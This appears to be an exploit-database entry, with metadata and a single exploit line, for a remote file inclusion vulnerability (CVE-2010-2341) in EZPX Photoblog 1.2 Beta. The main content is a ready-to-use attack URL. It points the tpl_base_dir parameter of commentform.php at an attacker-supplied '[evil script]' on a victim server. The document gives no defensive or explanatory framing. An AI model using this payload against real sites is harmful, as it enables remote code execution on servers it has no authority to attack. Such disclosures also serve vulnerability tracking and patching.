EZPX Photoblog 1.2 Beta - Remote File Inclusion

Author: sh00t0ut
type: webapps
platform: php
port: 
date_added: 2010-06-15  
date_updated:   
verified: 0  
codes: CVE-2010-2341;OSVDB-65646  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comezpx-1.2-beta.zip  

raw file: 13890.txt  

[~] EZPX photoblog 1.2 beta Remote Include Exploit
[~] Vendor Url: http://ezpx.org/
[~] Found by sh00t0ut
[~] Expl: http://[victim]/system/application/views/public/commentform.php?tpl_base_dir=[evil script]